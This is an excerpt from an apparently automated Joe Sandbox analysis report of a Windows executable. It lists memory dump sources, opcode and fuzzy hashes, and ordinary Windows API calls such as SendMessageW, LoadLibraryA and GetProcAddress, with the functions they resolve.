                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                      • String ID: msctls_updown32
                                                                                                                                                                                                                                                      • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                      • Opcode ID: 214b96b01c4f89b9b915f582e8b7d9c9cf5a2aae9da64b68669f832a183d0e63
                                                                                                                                                                                                                                                      • Instruction ID: 528deed1e525a1491013011079fdd4956a22fb45b31bd6f0cf671b3319e1a3b4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 214b96b01c4f89b9b915f582e8b7d9c9cf5a2aae9da64b68669f832a183d0e63
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F21CFB5600219AFDB00DF28DC91DB737ACEF5A3A4B050159FA049B3A1DB30EC52EB61
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F29A30
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F29A40
                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F29A65
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                      • String ID: Listbox
                                                                                                                                                                                                                                                      • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                      • Opcode ID: 1d481cc3f8b7b277fbf6cd37bb281b388c45d580db767e37c1b13ce7c488b00f
                                                                                                                                                                                                                                                      • Instruction ID: 8266ece6c0b41d999f425a982c7a7e26573ee3bf223c7fccc5875f2d32402672
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d481cc3f8b7b277fbf6cd37bb281b388c45d580db767e37c1b13ce7c488b00f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE21F532A04128BFDF118F54DC85FBB3BAAEF8A760F018129F94457190C6B59C51ABA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F2A46D
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F2A482
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F2A48F
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                      • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                      • Opcode ID: ee6bec7fda1e9aec81dfb5187030d884216079c3b394b8c3e264bf3874c6f0d9
                                                                                                                                                                                                                                                      • Instruction ID: a01db15dc7387ed2765475bb41094252c55f1b28b47d563e88e78eb5562c8983
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee6bec7fda1e9aec81dfb5187030d884216079c3b394b8c3e264bf3874c6f0d9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6511E771600218BFEF209F64DC45FAB37A9EF89764F114218FA45A60A1D2B1E811E720
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00EE2350,?), ref: 00EE22A1
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00EE22A8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                      • String ID: RoInitialize$combase.dll
                                                                                                                                                                                                                                                      • API String ID: 2574300362-340411864
                                                                                                                                                                                                                                                      • Opcode ID: e87325dc94474d51c402455be494459e05a74ba5b7aaf04bcaf356b49a1d6524
                                                                                                                                                                                                                                                      • Instruction ID: 0562ec349b602c2dfea56fbcce7504988aab545c099bf88aea494add9d5e0f0d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e87325dc94474d51c402455be494459e05a74ba5b7aaf04bcaf356b49a1d6524
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13E01A74690708ABDB905F71EC4EB6A3A68BB5571AF414424F602E50B0DFB98088FF05
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00EE2276), ref: 00EE2376
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00EE237D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                      • String ID: RoUninitialize$combase.dll
                                                                                                                                                                                                                                                      • API String ID: 2574300362-2819208100
                                                                                                                                                                                                                                                      • Opcode ID: aa5a655daf668c14a2c96854cae34fe12a0c9a9474d63dbcb7db7807251be550
                                                                                                                                                                                                                                                      • Instruction ID: 71c662e4befc18476de9a9b9e97596b814a8a20ace5c364735b949b18affda8a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa5a655daf668c14a2c96854cae34fe12a0c9a9474d63dbcb7db7807251be550
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CE08C70244B0CAFDB615F21EC0DB653A6AB750B16F010418FA0DE20B0CFB88058FF02
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: LocalTime__swprintf
                                                                                                                                                                                                                                                      • String ID: %.3d$WIN_XPe
                                                                                                                                                                                                                                                      • API String ID: 2070861257-2409531811
                                                                                                                                                                                                                                                      • Opcode ID: fa505a2ff73cabe893d6d34c77f6d1223b1b058ca298374d0a694a906bb01ecf
                                                                                                                                                                                                                                                      • Instruction ID: d75641ed44f8441310779f30444936fd3e113933c03c6377098289339b991faa
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa505a2ff73cabe893d6d34c77f6d1223b1b058ca298374d0a694a906bb01ecf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7AE0ECB280461C9BCA1097518D05AF973BCA704791F1020D3F946A1100D675DB95FA23
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00EC42EC,?,00EC42AA,?), ref: 00EC4304
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00EC4316
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                      • API String ID: 2574300362-1355242751
                                                                                                                                                                                                                                                      • Opcode ID: 73f7752026ae66359ba16525471c5b3ada6aef9e29d97d53ae0066cc51e2717a
                                                                                                                                                                                                                                                      • Instruction ID: b5df4cc758a9d42b7582d1ddb510e08819dbb9248b686ec2238dcbf3647f259f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73f7752026ae66359ba16525471c5b3ada6aef9e29d97d53ae0066cc51e2717a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07D0A7B4500B12EFE7204F24EC0CB0176E4AB55309B00841EFD45E21A0D7B0C880D711
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00F221FB,?,00F223EF), ref: 00F22213
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00F22225
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                      • String ID: GetProcessId$kernel32.dll
                                                                                                                                                                                                                                                      • API String ID: 2574300362-399901964
                                                                                                                                                                                                                                                      • Opcode ID: a490f0138c6ba8220713da99837ff072296514eb33a5b7713c8d17b9f7e98f02
                                                                                                                                                                                                                                                      • Instruction ID: f53ca8f77c19a0a5961560e8ece480ec97d7ae2c366ab6a7fde9b1ae5790fa11
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a490f0138c6ba8220713da99837ff072296514eb33a5b7713c8d17b9f7e98f02
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69D0A738900726EFE7614F30F80860176D4EB15314B00841AEC45E2190E771D880FB51
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00EC41BB,00EC4341,?,00EC422F,?,00EC41BB,?,?,?,?,00EC39FE,?,00000001), ref: 00EC4359
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00EC436B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                      • API String ID: 2574300362-3689287502
                                                                                                                                                                                                                                                      • Opcode ID: f6e6670360e77534ba03d549a710ad85ea011ca15411b91d057207764adc7529
                                                                                                                                                                                                                                                      • Instruction ID: 7d122ebbc53a713008d80f95b722d1a13d5313f4ebfae7c2f506d713f1a375dd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6e6670360e77534ba03d549a710ad85ea011ca15411b91d057207764adc7529
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1D0A774500B12AFD7204F34E908B0276E4AB6171DB00841EEC85E2190D7B0D880D711
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00F0052F,?,00F006D7), ref: 00F00572
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00F00584
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                      • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                                                                                                                      • API String ID: 2574300362-1587604923
                                                                                                                                                                                                                                                      • Opcode ID: 2f7754683527612030f754aac94a08879027d9377ba3da9489869a4ff744fe07
                                                                                                                                                                                                                                                      • Instruction ID: 2a26c09c21a8b6cac20eeadaee30c369a9906c55003c2e6332f88920b093a08a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f7754683527612030f754aac94a08879027d9377ba3da9489869a4ff744fe07
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49D05E34A003129AD7205F30AC08F5277F4AB15324F14841AEC45A2290DA70C480AB21
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(oleaut32.dll,?,00F0051D,?,00F005FE), ref: 00F00547
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00F00559
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                      • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                                                                                                                      • API String ID: 2574300362-1071820185
                                                                                                                                                                                                                                                      • Opcode ID: 07cdd5ed3ed5b1e1fbe03cb712130f2ac5f47d2d43ff09a9ad64df8e1469f923
                                                                                                                                                                                                                                                      • Instruction ID: ba47d6cb656afb6383e21c838c59fbb098029175fb06132de4ff9d02ead792f4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07cdd5ed3ed5b1e1fbe03cb712130f2ac5f47d2d43ff09a9ad64df8e1469f923
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EDD0A774A007129FD7208F30EC0875176E4AB11315F14C41EFC8AD3190DA70C880FA11
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00F1ECBE,?,00F1EBBB), ref: 00F1ECD6
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F1ECE8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                                                                                                      • API String ID: 2574300362-1816364905
                                                                                                                                                                                                                                                      • Opcode ID: e84ede54e393a760487c3f45b79b52158aa5b79c3eea2fe92dc659ded2508927
                                                                                                                                                                                                                                                      • Instruction ID: e269bea06711e9413e08ddd2aa8c063a03a0eff9494f4dcab48958556c933677
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e84ede54e393a760487c3f45b79b52158aa5b79c3eea2fe92dc659ded2508927
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23D0A7349007239FDB245F60EC4868276E4AB52314B00C41AFC49D2150DB70D8C0FB51
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00F1BAD3,00000001,00F1B6EE,?,00F5DC00), ref: 00F1BAEB
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F1BAFD
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                      • API String ID: 2574300362-199464113
                                                                                                                                                                                                                                                      • Opcode ID: 9022647483a7121d8550e2805e0d260e5d32d9ab75dd91970b1442561cc7de31
                                                                                                                                                                                                                                                      • Instruction ID: c6e74ff7cabf866b1a9301a795ea5624700f9b7af23b009f34ce2ca7ca184477
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9022647483a7121d8550e2805e0d260e5d32d9ab75dd91970b1442561cc7de31
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DD0A734D04712DFD7309F20EC48B5176E4AB51314B10841AFC47D2550D770D8C0E712
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00F23BD1,?,00F23E06), ref: 00F23BE9
